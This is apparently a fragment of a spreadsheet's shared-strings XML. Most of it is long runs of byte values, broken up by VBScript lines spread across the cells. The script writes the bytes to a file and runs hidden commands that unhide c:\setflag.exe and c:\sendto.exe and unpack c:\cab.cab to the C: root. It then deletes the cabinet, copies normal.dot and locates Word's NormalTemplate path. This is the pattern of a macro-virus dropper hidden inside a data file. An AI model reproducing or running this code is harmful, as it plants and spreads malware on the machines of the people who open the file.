240 234 43 47 11 115 106 97 39 154 191 255 41 146 134 142 79 40 115 23 114 191 82 249 167 189 211 186 78 106 86 20 230 67 78 213 124 232 164 253 136 249 127 32 151 19 234 33 10 116 135 242 201 205 38 175 190 34 45 94 47 84 143 245 255 27 253 178 244 194 243 128 81 200 78 137 239 176 247 247 </t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 173 189 242 202 43 74 90 254 156 40 16 112 118 170 140 15 186 242 63 226 211 69 88 49 198 108 45 240 14 224 231 35 4 204 234 56 103 25 76 140 234 42 127 117 126 15 153 234 47 111 205 236 34 153 99 156 185 47 187 21 187 142 149 144 150 30 56 0 219 137 189 135 151 105 118 6 47 167 177 166 98 22 111 150 195 52 208 203 200 225 233 228 47 205 224 223 105 24 247 5 28 85 128 170 54 217 47 235 72 147 121 217 143 163 32 131 131 49 108 209 13 130 97 147 74 174 203 94 224 197 17 36 110 43 220 129 155 38 76 216 171 158 174 196 203 227 170 234 176 15 4 175 245 186 62 27 232 198 148 21 182 239 50 143 79 170 188 106 62 148 98 62 20 182 247 239 154 3 210 243 27 4 212 121 216 10 78 252 13 126 158 245 138 248 14 127 193 120 245 229 149 43 123 87 170 93 97 238 196 150 141 1 52 6 6 170 168 46 65 108 180 174 209 170 23 106 122 221 1 131 252 118 50 234 179 32 227 75 132 193 82 239 68 177 87 171 36 87 76 209 97 198 190 14 67 62 130 210 225 22 16 27 206 77 182 176 36 97 151 219 197 105 35 71 12 236 29 218 210 91 122 247 37 98 39 61 123 183 66 3 202 236 145 35 9 172 69 43 178 98 17 180 173 252 46 244 34 22 82 14 167 19 38 224 45 165 68 159 21 62 234 12 206 228 163 143 238 202 136 181 117 52 212 111 237 233 33 45 221 205 71 107 130 233 124 116 247 174 169 177 230 142 134 46 89 149 161 88 99 208 212 155 155 143 69 248 2 124 117 4 41 42 240 165 124 63 154 233 14 38 30 212 159 38 181 39 213 177 93 228 81 114 101 221 71 219 112 121 </t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 108 145 5 90 57 167 144 205 192 85 240 191 51 178 105 26 0 148 62 184 134 187 138 74 253 141 155 183 68 52 203 75 118 58 86 53 119 225 99 182 110 139 249 137 86 181 1 10 214 112 55 54 110 214 8 47 161 235 37 236 63 104 164 61 41 70 218 239 224 7 116 18 251 49 208 147 251 129 180 223 165 147 118 147 70 218 185 1 97 134 146 213 249 91 252 103 72 16 155 10 49 138 196 80 242 193 54 109 225 18 54 197 22 22 166 96 251 92 20 16 230 186 99 56 254 231 237 119 159 47 253 102 251 221 87 75 136 189 232 193 82 205 126 247 126 12 195 144 119 25 188 165 244 207 180 223 197 198 255 180 253 46 66 125 179 253 174 94 127 15 4 237 224 89 240 13 224 107 193 111 2 191 1 124 89 233 95 202 126 151 204 132 138 3 126 21 252 27 224 79 148 254 87 216 239 230 150 77 216 239 14 173 185 173 253 110 222 26 178 30 8 188 183 24 226 117 224 247 174 249 35 246 187 8 249 231 217 239 146 54 255 67 246 187 122 219 23 161 255 203 224 175 129 31 3 79 67 182 9 124 6 248 111 149 253 165 236 119 181 249 113 192 223 98 240 143 128 111 40 251 11 217 239 198 211 143 13 217 38 34 86 157 100 87 219 194 189 69 248 121 215 117 254 6 29 124 96 244 55 112 77 176 76 206 7 72 0 184 27 226 209 254 33 198 216 143 129 5 130 227 176 154 48 85 108 210 213 87 160 42 108 130 213 165 0 163 177 96 112 73 226 109 70 140 165 228 53 112 163 121 196 106 198 107 27 177 207 209 172 91 209 6 232 107 22 255 35 69 71 105 131 185 235 58 106 13 13 192 130 255 223 211 55 153 104 224 158 240 115 133 64 2 228 </t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 209 166 77 124 208 66 62 112 193 218 140 71 254 252 67 210 187 56 176 37 246 137 155 46 211 235 90 235 128 90 55 188 237 54 31 172 205 214 62 88 179 169 249 5 247 195 221 193 173 242 249 2 134 141 158 186 203 80 65 83 196 248 212 204 23 181 151 102 70 152 131 48 202 61 62 159 167 78 222 230 32 101 63 218 170 189 9 160 201 221 96 34 150 39 144 207 114 50 158 4 81 36 67 229 44 50 154 24 87 85 9 174 140 62 44 69 113 105 142 202 205 86 185 44 173 28 173 150 80 238 194 134 46 125 28 179 145 56 69 26 177 114 12 225 159 4 151 213 231 211 192 69 87 182 102 4 205 56 64 106 179 170 153 207 19 155 77 161 250 162 253 188 185 235 71 72 248 59 128 60 221 201 135 141 217 99 178 5 168 1 12 79 124 91 112 125 196 151 143 169 74 58 202 228 34 14 88 232 32 57 98 245 197 252 142 143 216 237 30 149 251 72 235 33 96 152 104 23 6 93 14 131 37 69 26 150 47 146 149 17 184 51 32 32 46 26 113 165 209 172 35 191 99 182 185 11 25 70 59 55 251 169 187 180 161 125 181 10 204 80 247 30 194 83 74 254 163 98 249 112 173 64 222 163 9 111 169 91 15 74 244 82 13 231 77 9 26 206 31 9 213 67 4 231 233 19 56 219 206 17 148 161 247 243 236 207 189 208 201 197 175 245 195 254 8 240 241 249 56 218 231 83 146 52 100 188 158 58 43 114 79 56 170 34 93 186 53 119 125 23 95 147 7 46 53 96 176 33 155 193 35 215 125 210 43 149 170 108 90 40 143 98 25 135 120 165 164 123 132 187 10 137 205 92 98 14 158 72 241 136 190 157 152 218 219 108 167 44 109 </t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t xml:space="preserve">59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238 35 159 199 43 223 253 5 57 91 74 106 108 13 206 217 70 112 13 236 87 217 5 42 55 228 213 218 199 45 163 183 10 77 226 198 7 166 22 215 228 160 110 67 44 249 223 253 202 170 199 41 39 91 30 253 138 78 73 218 208 79 247 150 245 211 104 85 178 162 183 255 77 164 65 243 81 39 146 207 102 155 184 196 208 133 167 148 180 78 180 200 70 62 115 90 232 88 8 7 215 147 178 125 62 21 54 14 108 142 220 212 9 41 41 183 210 3 66 182 43 10 8 149 43 203 102 130 25 157 151 48 254 0 177 73 53 144 252 150 203 57 71 197 183 187 13 226 5 145 17 29 180 59 242 174 58 191 97 171 99 242 223 110 76 186 73 55 233 38 221 164 155 116 147 110 210 77 186 73 55 233 38 221 127 185 251 254 118 138 26 175 165 40 147 159 162 102 129 191 23 252 82 240 69 224 31 1 95 11 190 25 124 59 248 189 224 15 128 63 4 254 36 120 25 124 2 212 159 13 126 17 248 82 240 181 224 119 130 191 12 109 238 131 240 167 224 127 14 254 8 248 19 224 63 194 50 240 55 192 167 60 78 81 89 224 179 193 47 4 255 29 240 101 224 55 129 111 0 255 52 248 103 193 191 4 254 231 143 107 248 170 224 10 178 28 84 5 248 32 215 200 214 239 240 91 253 193 96 83 208 74 81 105 41 20 181 161 108 157 199 163 229 96 146 242 148 172 93 29 151 164 138 214 149 59 75 214 222 204 89 191 52 119 81 94 90 202 3 86 174 177 230 177 6 191 149 109 178 214 55 214 179 245 53 13 245 187 253 214 58 127 77 179 86 15 225 150 33 28 254 164 129 191 177 137 123 188 206 218 210 92 179 205 111 221 14 125 55 52 237 170 </t>
  </si>
  <si>
    <t xml:space="preserve">143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5 102 7 215 192 214 179 117 65 127 77 45 204 208 182 39 190 10 127 251 121 209 43 225 111 17 0 120 90 74 205 99 141 77 193 29 48 1 177 223 150 96 253 193 29 245 141 183 206 87 110 254 109 219 243 55 194 12 54 53 238 240 55 178 0 142 176 121 183 133 173 9 62 206 33 96 75 108 126 115 23 33 236 246 134 38 232 174 241 113 107 115 83 125 35 75 170 66 78 173 191 86 235 191 188 126 91 176 169 165 105 59 107 245 214 183 224 82 21 230 228 88 215 235 27 180 172 254 177 96 77 176 13 225 82 112 207 233 217 46 156 142 185 41 41 110 109 80 223 193 239 151 22 46 92 72 45 143 141 178 177 6 160 184 198 39 26 155 118 53 174 160 168 213 126 182 172 166 133 117 194 22 216 233 119 55 53 115 205 36 79 75 251 234 27 107 155 118 81 229 254 150 150 154 199 253 43 155 90 157 20 215 226 15 218 22 45 172 109 104 184 121 222 241 252 172 88 231 160 86 130 199 248 103 16 142 232 241 157 21 14 106 55 248 229 181 55 225 7 240 220 109 253 239 65 59 142 227 108 21 54 237 216 81 211 88 91 86 223 232 119 82 172 1 114 188 254 96 11 236 35 138 234 160 92 112 74 96 53 182 193 36 82 63 54 20 195 30 95 21 244 227 232 12 250 220 147 37 163 168 59 169 194 134 166 22 127 49 52 212 224 167 94 166 86 53 112 45 117 171 234 27 252 43 185 237 219 161 57 138 58 159 224 11 214 179 126 204 163 254 150 180 228 108 128 51 64 101 37 172 135 157 77 178 169 23 18 54 232 219 216 31 235 148 26 37 56 114 193 32 236 192 88 102 32 193 227 103 177 138 27 183 158 31 250 255 95 9 149 141 117 164 243 90 87 </t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t xml:space="preserve">235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 237 77 78 234 239 200 12 22 249 91 216 96 83 27 245 67 146 42 4 18 1 232 80 111 37 120 53 234 72 150 234 193 132 245 108 67 101 227 46 56 13 212 235 177 18 109 234 169 151 72 189 245 126 45 217 142 88 197 225 176 152 210 90 68 52 156 212 91 100 29 220 216 61 245 11 114 202 10 221 20 245 16 98 182 206 85 142 241 21 24 199 37 114 214 214 6 201 218 29 49 148 1 69 208 15 59 204 121 13 246 224 106 172 93 183 93 91 239 139 134 137 89 220 208 20 155 90 234 45 67 89 97 121 77 179 54 93 80 43 28 159 134 217 243 104 179 129 41 156 29 128 240 222 154 3 48 107 92 235 215 186 202 190 122 214 39 221 164 155 116 147 110 210 77 186 73 55 233 254 148 59 116 167 131 250 241 106 199 68 122 227 108 199 215 96 238 219 241 208 130 45 247 237 88 132 127 108 11 40 42 248 88 14 181 42 91 179 72 68 23 254 158 99 34 52 24 226 42 90 190 222 31 218 118 24 254 8 62 9 186 159 116 147 238 207 117 137 176 245 82 245 248 28 136 199 126 207 241 175 227 226 248 175 147 24 61 254 87 113 241 61 113 241 189 113 241 31 196 197 159 141 139 63 23 23 71 67 65 252 105 69 84 6 60 163 203 217 152 192 109 111 77 124 110 230 55 237 109 235 54 237 227 183 107 143 105 70 21 71 33 196 250 7 30 211 190 189 111 133 16 127 100 160 24 194 233 16 102 67 152 14 97 180 70 251 230 36 12 33 54 252 60 132 179 80 76 135 16 127 182 241 190 26 237 127 9 83 16 182 66 48 188 213 65 161 242 97 8 194 221 16 158 128 16 255 35 194 187 248 17 10 132 111 64 24 213 126 228 146 156 199 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 200 30 245 130 158 238 211 241 57 160 247 247 247 122 254 255 209 241 123 79 47 63 173 151 103 77 209 230 34 230 12 9 52 217 66 104 196 191 245 233 182 167 231 234 249 63 61 175 133 125 63 209 194 206 31 15 225 146 81 142 39 67 36 60 8 240 253 251 207 238 183 222 230 28 116 142 107 161 67 15 255 247 159 9 239 212 195 67 0 255 254 75 23 95 154 69 253 235 75 242 75 27 111 223 254 147 125 36 134 63 227 82 113 118 243 89 43 181 229 108 224 236 162 175 195 159 58 243 241 208 117 144 160 159 140 213 156 116 147 110 210 77 186 73 55 233 38 221 164 155 116 255 63 220 255 3 24 156 25 249 28 30 0 128 67 75 236 61 11 116 83 199 149 35 33 176 73 28 91 124 28 12 24 243 16 159 24 97 20 155 143 237 240 9 194 198 4 103 49 22 182 49 180 113 106 132 45 35 61 100 73 145 100 12 27 118 81 119 113 14 212 104 227 238 226 46 77 147 28 218 101 123 186 57 156 214 105 56 45 39 101 79 156 141 115 32 41 73 73 154 156 165 105 178 135 228 108 55 228 71 217 109 210 165 141 131 246 222 59 243 158 222 179 36 219 73 211 108 207 238 27 233 206 247 206 204 157 59 119 62 111 222 155 153 186 47 247 209 28 223 66 207 44 184 61 95 204 235 198 65 11 226 230 206 125 50 151 157 158 252 194 188 51 166 205 47 204 107 242 250 34 234 59 218 54 119 0 223 146 238 242 72 225 174 128 228 11 72 27 234 27 165 206 96 187 199 113 203 45 55 45 80 158 185 190 246 187 95 254 244 189 191 63 172 192 166 255 254 230 225 231 193 252 206 135 143 146 105 251 240 33 50 27 124 109 94 12 87 242 118 213 48 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 131 142 112 36 220 198 68 25 92 2 207 149 130 231 220 57 231 55 119 106 179 169 107 108 174 106 174 43 47 117 108 216 188 217 104 69 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 245 167 175 134 31 175 144 227 190 10 57 112 188 82 126 212 90 41 71 0 182 236 170 144 95 245 86 200 102 48 75 106 236 242 67 96 62 212 86 33 111 159 82 41 183 63 81 33 255 96 131 93 126 181 205 46 215 54 217 229 51 143 216 229 175 65 252 229 7 86 202 147 79 87 200 123 0 255 158 45 118 121 251 78 187 60 167 163 66 222 2 241 76 109 229 242 235 127 99 151 15 62 82 41 63 59 80 46 251 250 203 229 111 255 176 66 254 171 29 118 249 155 219 237 178 251 137 74 249 69 200 227 69 192 157 243 147 74 217 12 230 218 123 43 228 59 255 173 88 190 145 87 41 15 77 44 151 191 51 173 82 126 254 214 74 185 6 112 191 59 169 92 94 51 189 82 222 8 254 229 64 255 87 238 178 203 222 175 219 229 119 165 10 249 73 160 97 101 94 133 124 3 252 176 124 139 216 116 42 231 220 101 78 246 70 25 127 0 190 110 117 178 77 96 22 205 117 178 133 0 7 240 126 72 128 39 1 150 74 78 246 10 128 109 30 135 173 0 67 0 102 155 147 57 4 212 3 108 21 240 85 128 127 0 248 145 128 127 5 248 133 128 137 243 57 44 2 40 22 176 31 224 91 0 223 23 240 51 128 151 4 196 23 56 217 227 11 57 124 99 145 147 253 248 54 14 205 197 78 118 239 98 39 123 86 64 187 221 201 246 44 113 178 159 11 248 4 32 183 196 201 182 1 252 5 192 63 2 188 0 240 17 192 123 75 157 108 154 195 201 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 67 250 9 210 251 72 63 68 250 89 210 157 164 127 143 244 211 164 187 72 223 68 186 149 244 16 233 37 164 15 144 238 37 253 36 233 18 233 57 164 199 72 207 38 253 97 43 114 211 251 225 52 39 187 114 21 191 12 32 85 170 89 146 241 231 222 159 125 237 111 79 221 253 88 227 175 115 170 127 159 39 190 192 55 49 101 53 198 21 14 202 158 182 104 25 126 88 16 99 205 106 232 208 173 162 158 132 66 123 193 12 60 180 142 251 31 254 237 116 93 123 71 18 154 171 86 206 187 54 215 174 243 255 75 157 235 38 54 89 44 140 93 46 114 178 195 211 33 173 107 165 148 73 54 75 126 179 243 14 192 89 72 15 97 223 52 254 173 1 190 63 199 179 185 122 211 244 53 244 241 122 192 19 21 22 119 84 83 172 15 77 201 178 92 132 60 79 64 123 29 50 51 42 199 162 169 184 2 229 100 118 214 194 214 179 106 182 10 204 110 200 109 63 152 123 217 46 208 125 44 192 162 204 195 194 96 122 192 214 2 76 11 179 32 147 193 213 6 238 50 230 32 204 144 209 225 255 31 82 40 119 138 42 118 242 187 132 213 54 0 110 105 250 161 138 171 47 155 214 127 253 39 191 8 188 243 163 200 71 55 129 228 226 15 219 135 86 185 192 141 242 110 17 235 184 102 145 54 166 213 34 112 173 162 61 109 154 145 252 214 13 115 50 197 184 139 111 184 40 75 10 52 195 239 60 146 11 195 43 0 34 32 139 97 144 213 16 72 36 74 236 110 144 202 14 176 249 65 74 35 32 205 17 146 225 78 144 219 93 170 228 162 218 77 50 29 129 120 232 231 99 110 136 209 1 88 126 214 78 50 143 10 191 255 209 183 3 55 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 178 60 188 147 85 82 231 223 251 180 64 60 37 6 246 30 251 0 187 83 148 43 125 8 151 27 44 97 27 132 135 160 62 21 158 167 75 19 203 221 14 174 168 90 191 73 236 70 176 253 185 136 167 207 79 27 139 127 199 212 70 189 97 68 164 128 37 218 173 169 117 198 236 25 234 33 83 140 73 106 154 124 224 89 8 253 109 61 171 131 20 92 172 6 236 11 129 227 183 3 134 68 252 138 146 212 236 2 215 18 72 17 117 60 99 127 44 154 194 80 127 1 33 123 73 220 0 148 44 10 116 38 49 139 71 161 61 21 27 235 248 15 165 55 53 85 45 141 218 54 18 133 112 172 5 124 143 21 164 182 16 128 148 202 88 5 91 6 161 203 216 114 208 151 147 94 6 191 82 162 143 191 115 58 76 223 127 185 129 138 54 248 117 138 246 130 239 86 66 224 27 129 159 34 207 168 114 41 255 118 72 27 235 189 155 248 134 189 138 95 248 50 209 70 83 249 164 228 119 148 242 11 209 120 216 73 212 243 190 137 1 5 62 234 39 194 244 117 32 151 81 196 232 2 28 137 237 0 217 225 210 214 38 232 80 242 84 228 163 72 149 93 73 199 157 136 24 109 35 66 158 118 65 250 30 145 6 82 24 2 252 165 16 186 10 220 237 212 7 120 168 29 106 219 75 97 90 190 107 83 102 172 36 165 239 146 198 140 211 92 181 190 92 121 103 213 218 186 119 151 187 217 29 222 208 21 226 118 220 166 69 27 251 68 152 43 12 51 21 190 119 139 135 135 61 158 198 104 88 141 91 187 12 98 11 59 248 131 163 58 24 218 175 186 235 130 123 61 42 46 38 83 31 242 4 52 249 18 178 80 138 95 83 36 186 197 163 </t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 176 189 56 133 212 31 47 119 230 16 222 224 55 231 55 137 4 63 101 238 92 205 251 151 97 150 126 174 230 26 134 242 35 238 149 187 120 193 192 190 253 92 207 10 200 209 194 204 177 115 61 37 96 195 239 68 227 100 115 37 242 113 186 223 113 164 103 232 70 34 113 174 231 44 232 24 35 222 143 182 120 60 132 164 230 227 179 64 60 94 66 246 28 202 107 24 95 189 203 224 148 184 19 91 172 204 188 254 25 10 226 214 68 62 62 95 196 251 209 209 32 110 6 75 228 159 228 232 19 137 168 87 32 11 162 178 231 130 200 246 12 246 38 87 214 227 109 137 23 122 251 209 247 200 148 222 158 139 104 174 183 244 246 99 4 188 58 166 231 18 249 228 200 38 239 73 202 17 83 223 42 242 74 228 227 227 205 95 15 73 189 23 227 117 49 78 60 100 57 73 205 242 2 68 225 89 98 127 20 175 137 185 226 113 116 37 19 192 103 165 222 243 156 152 211 255 9 196 188 210 107 58 98 238 93 111 57 82 101 233 93 159 125 164 42 187 183 54 231 200 221 152 255 21 204 191 127 39 47 100 33 47 164 200 31 108 37 156 183 33 226 101 161 134 72 217 156 200 183 18 90 78 222 83 20 222 51 24 221 2 100 102 101 32 83 102 80 24 136 141 238 6 181 238 144 80 48 240 57 239 141 71 162 148 139 174 150 38 243 106 177 20 100 170 22 167 174 90 110 82 51 95 80 160 205 156 115 226 177 107 227 175 150 74 202 209 153 169 90 78 168 213 114 179 154 101 75 129 190 90 78 164 175 22 136 61 168 198 206 225 229 219 135 185 41 60 241 170 194 186 53 190 237 98 131 90 184 92 206 197 154 139 128 115 154 243 13 159 146 243 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 186 190 180 141 191 72 91 238 129 116 229 158 171 161 74 148 123 158 40 247 64 230 114 47 80 133 161 96 166 78 24 250 93 92 92 209 195 165 74 50 151 7 46 156 183 92 5 225 28 234 189 233 8 94 44 117 100 147 165 247 238 236 35 155 178 123 27 114 142 184 212 102 202 59 33 209 16 147 205 52 222 159 195 25 209 199 169 210 54 90 206 18 145 163 174 209 246 83 163 125 57 239 16 94 45 0 180 47 84 105 95 161 163 253 28 245 172 46 242 59 171 250 29 187 193 87 61 206 245 28 5 219 205 36 240 131 163 246 67 37 31 100 238 135 84 254 156 189 161 45 160 150 63 31 188 159 153 63 28 227 167 28 35 142 4 1 86 127 31 154 46 75 111 28 105 69 220 254 227 228 147 35 79 240 54 205 84 217 57 162 242 215 100 236 231 128 71 183 169 60 242 143 224 209 105 176 177 71 77 96 59 5 182 9 49 146 175 99 152 75 77 223 168 108 201 127 127 212 238 249 208 204 212 238 249 144 82 239 241 28 173 32 64 3 232 199 204 33 131 19 90 9 200 209 8 141 82 170 9 74 169 172 106 239 157 119 104 30 23 132 98 181 144 39 63 155 32 212 13 166 237 231 149 18 207 127 111 20 65 216 214 55 170 20 188 253 238 88 82 240 236 187 127 116 41 176 171 12 26 156 153 58 202 108 16 4 92 16 4 92 84 8 120 69 33 224 146 32 96 68 171 46 25 217 170 11 51 182 106 77 111 166 169 191 32 175 191 37 42 121 255 158 70 72 167 207 114 10 33 205 92 127 39 70 173 191 182 119 50 215 159 152 255 112 12 202 5 176 226 3 104 222 109 233 37 2 16 55 126 134 124 4 250 84 129 126 84 160 </t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 128 117 210 80 170 178 225 98 154 90 234 251 143 241 215 18 73 3 159 25 166 145 134 101 201 25 232 108 253 12 0 109 52 159 63 195 41 90 78 204 141 65 29 175 225 30 43 196 100 62 145 127 158 207 19 227 107 168 4 248 50 197 197 159 100 32 71 124 205 226 194 179 187 241 40 240 252 3 52 183 225 120 151 120 50 184 111 207 187 97 54 54 147 16 151 33 138 226 13 205 198 107 74 118 168 189 88 57 226 237 67 188 158 16 103 96 122 188 10 196 59 138 120 58 18 82 240 42 17 239 228 216 249 222 129 211 40 155 218 179 224 139 36 112 198 241 126 152 173 220 201 249 119 102 118 234 224 115 126 182 118 240 209 119 82 186 241 194 197 197 54 71 243 148 17 143 159 229 131 240 240 13 117 16 22 247 210 64 216 235 55 52 113 245 5 184 172 45 64 188 231 117 30 225 125 77 98 233 199 216 73 202 152 129 114 129 43 46 222 43 99 115 123 53 226 13 143 205 237 53 136 103 45 28 147 219 107 17 175 164 112 204 124 239 68 60 103 225 152 249 174 67 188 246 177 243 117 210 19 186 54 203 68 126 37 23 208 245 106 19 9 21 234 158 16 109 106 7 35 132 66 169 42 46 20 52 197 162 184 167 196 211 118 218 254 74 215 87 169 131 40 175 88 122 84 206 209 138 137 82 129 36 6 250 113 238 254 183 198 26 231 190 244 214 167 26 231 236 111 141 127 156 163 94 166 223 153 118 156 83 100 118 152 139 96 142 102 114 168 76 244 39 42 178 87 0 12 175 226 61 205 17 234 205 56 191 115 156 74 215 215 255 230 248 7 194 88 97 166 238 22 69 188 90 173 215 135 11 83 187 216 165 111 126 62 3 225 216 19 33 90 134 </t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30 5 117 97 89 242 253 246 169 229 44 237 89 18 168 158 132 176 33 128 151 1 222 2 248 47 128 73 48 158 221 10 176 0 96 5 192 6 128 102 0 47 192 1 128 7 0 142 1 76 49 179 216 119 193 60 13 176 3 236 255 2 230 5 128 215 0 174 1 152 97 64 179 2 236 132 176 11 0 54 176 151 3 108 0 104 0 104 1 56 12 254 126 48 31 0 56 14 240 24 192 25 128 231 87 226 58 55 139 93 2 243 10 192 239 1 114 97 224 43 4 88 1 80 85 142 231 12 66 45 2 68 1 14 1 124 3 224 4 192 99 0 167 203 121 249 70 238 185 104 173 174 109 11 210 178 118 171 187 93 110 237 8 69 221 129 116 107 169 105 215 90 71 174 231 82 10 237 190 189 173 157 229 43 146 41 134 61 157 101 250 208 229 203 88 154 213 220 100 120 89 185 79 231 19 86 188 210 174 18 87 215 70 124 73 154 171 189 123 34 209 61 218 21 115 177 